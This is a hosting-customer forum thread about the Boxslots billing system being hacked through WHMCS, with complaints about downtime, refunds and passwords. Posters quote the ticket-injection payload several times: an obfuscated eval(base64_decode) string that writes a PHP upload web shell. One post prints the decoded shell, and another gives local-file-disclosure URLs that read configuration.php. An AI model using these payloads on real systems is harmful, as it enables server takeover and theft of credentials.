Boxslots hacked AGAIN

[dark_hunter]

Boxslots your doing a good job and at situation at hand, keep it up, and propz for letting people know.

 

[rk-boxslots]

i asked rk and other then they all says NO, so i was about to make a call to paypal(i told them that) then they say kk we are refunding you...

if they so no or not refunding you. call PP fastest you can.

if you used there host for more days then what there TOS says, then don't asked for refund. (i was with them for like less then 24hrs)

Blatant lie, I told you to PM me your email or invoice ID and you would be refunded. Any need for that?

 

[itmees]

maybe Jamie/nano is behind this <_< anyhow, whmcs isnt the only billing system out there, it is probably the most used one though. clientexec for example is quite good also

 

[Loonycgb2]

People have tried to hack my WHMCS all day today. with the same exploit its getting annoying to log in to the ticket: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php})

:p thats a worthless code

$code = <?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>;
$fo = fopen("templates_c/red.php","w");
fwrite($fo,$code);

 

[dotvps]

@ ^ Read it , php shell into templates_c/red.php

 

[Loonycgb2]

yeah i know the code but its been patched they are useing a exploit posted by a person named P-Vel0 his code fails it was for anyone who hasnt used the latest patch for whmcs

 

[dotvps]

other tickets:

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php})



--------









{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt='));{/php})








-------------



{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJq MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3Blbigic3RhdHVzL3JlZC5waHAiLCJ3 Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTs='));{/php})











------------------------


{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php})

 

[Loonycgb2]

The first url creates a ticket but if its patched the ticket actually is sent with the php code showing

Boxslot owner read = http://www.wjunction.com/14-news-current-events/115473-whmcs-security-exploit-patch.html

# Title      : WHMCS (clientarea.php) Local File Disclosure 
# Author     : Red Virus >>>c3o@w.cn
 
# Product    : WHMCS ( WHMCompleteSolution )
# Vendor     : http://whmcs.com/
# Date       : 11/04/2011
# Version    : 3.X.x
# Tested on  : linux+apache
# Homepage   : www.alm3refh.com 
================================================================
 
  
http://localhost/[PATH]/clientarea.php?action=[wrong_value]&templatefile=[LFD]%00
  
http://localhost/[PATH]/clientarea.php?action=red&templatefile=../../configuration.php%00
  
show the page source to see Disclosure file
  
 
================================================================

 

[CuraHack]

So now that we know what caused the "hack", was it a known security hole, or is it something unknown for the developers? Thus they hadn't released a patch for it yet?

 

[rohan123]

@CuraHack,

Developers always get to know about exploits when someone is actually hacked.

When any WHMCS user ( host ) tells them "hey i am hacked" then they see and find the hole.

Then they release the patch and fix it.

simply how are u gonna know that somebody dented ur car when u were inside until somebody tells u.. hey there is a big dent check it out.

WHMCS's new version is a piece of ____ it has many holes.. all of them are fixed now.. also boxslots is taking further prevention to avoid this in future.

so don't worry and stick with them :D

 

[Sonic]

billing area is dead.

billing.boxslots.com

hacked again?

you can secure it a bit installing PHPGuard and suPHP and adding some rules to your .htaccess file.

 

[downote]

why hack the boxslots, why not hack tehhost, :D

 

[Sonic]

first install the zend server:
http://www.zend.com/en/products/server/

after that then install zend guard:
http://www.zend.com/en/products/guard/

it will encrypt all PHP files on your server.

good luck

 

[wojtek1988]

Guys, 4th day, my site is down, i see promisess only in tickets. All was cool till saturday. Now it doesn't look good. Now i can't even access billing system. Few days more and search engines will tell me to gtfo :'(
Update somewhere what is goin on,
thanks

 

[l0calh0st]

Sonic, that has nothing to do with the exploit.

Also WHMCS is the only good billing software, scripts like ClientExec or Hostbill aren't even getting close.

 

[lukip006]

why hack the boxslots, why not hack tehhost, :D

What has TehHost to do with BoxSlots getting hacked moron? Looks to me like an idiotic reply .

 

[YIFY]

ANy further updates?

 

[Bharat]

Hello all , The billing url is changed now , for security we have took every proper steps that we can :

http://boxslots.com/billing

PS : DNS Is propagating so do give it time to get propagated all where .

 

[wojtek1988]

My old password isnt working to login client area, requested reset and waiting...

edit: i guess its not working too :/

 

[xexmodder]

Same here, pass isn't valid and I requested a new pass but it's isn't arriving threw email, I guess mail server isn't up yet..